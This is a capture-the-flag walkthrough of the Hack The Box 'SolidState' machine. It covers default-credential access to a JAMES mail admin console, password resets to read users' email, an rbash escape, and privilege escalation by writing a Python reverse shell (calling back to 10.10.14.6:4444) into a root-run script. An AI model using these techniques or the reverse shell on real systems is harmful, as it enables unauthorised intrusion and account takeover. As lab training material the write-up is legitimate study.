SolidState

https://app.hackthebox.com/machines/85

Nmap

sudo nmap 10.10.10.51 -p- -sS -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
25/tcp   open  smtp    JAMES smtpd 2.3.2
80/tcp   open  http    Apache httpd 2.4.25 ((Debian))
110/tcp  open  pop3    JAMES pop3d 2.3.2
119/tcp  open  nntp    JAMES nntpd (posting ok)
4555/tcp open  rsip?
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel

James SMTP Server

Looking at our nmap results we see the target system is running JAMES 2.3.2 is an Apache mail server.

Some quick research shows that RCE is possible on version 2.3.2. However, this is not our attack vector.

The default login credentials for the admin interface on port 4555 is usually set to root:root. Connecting to the admin interface with telnet we are able to authenticate.

Running the HELP command we are then able to list known users using the listusers command.

Password Resetting

We also see a command for resetting a users password. From here I reset every single users password and then logged into pop3 using telnet in an attempt to discover sensitive information contained within emails.

# Reset mindy's password
setpassword mindy password

Then login over telnet to pop3.

telnet 10.10.10.51 110

USER mindy
PASS password
LIST

Retrieving email index 2 we discover SSH credentials.

retr 2

SSH

We are then able to authenticate over SSH as the user Mindy.

Restricted Shell

After logging in we notice we are in a rbash shell which is a restricted shell. I have previously covered rbash shell escapes in "Sunset Decoy" where I will be using the same technique to escape the restricted shell.

SunsetDecoy

ssh mindy@10.10.10.51 -t "bash --noprofile"

User Flag

We are then able to grab the user.txt flag.

Enumeration

After performing some basic enumeration steps I was unable to identify any interesting routes for escalation. I decided to upload a pspy binary to monitor for scheduled tasks and processes that might be running.

After uploading the binary to the target system I then change the permissions to allow execution.

chmod +x ./pspy32

Then executed the binary.

In the output we notice the following python script is being executed on a regular interval.

Browsing to the file we notice it is owned by root. However, we have rights to edit the file.

Privilege Escalation

To take advantage of this for privilege escalation we can clear the contents of the file and use nano to input a Python reverse shell.

# Erase file contents
echo  > tmp.py

Then use nano to insert the following reverse shell:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.6",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")

Root Flag

A few minutes later we will receive a root shell. Where we can then grab the root.txt flag.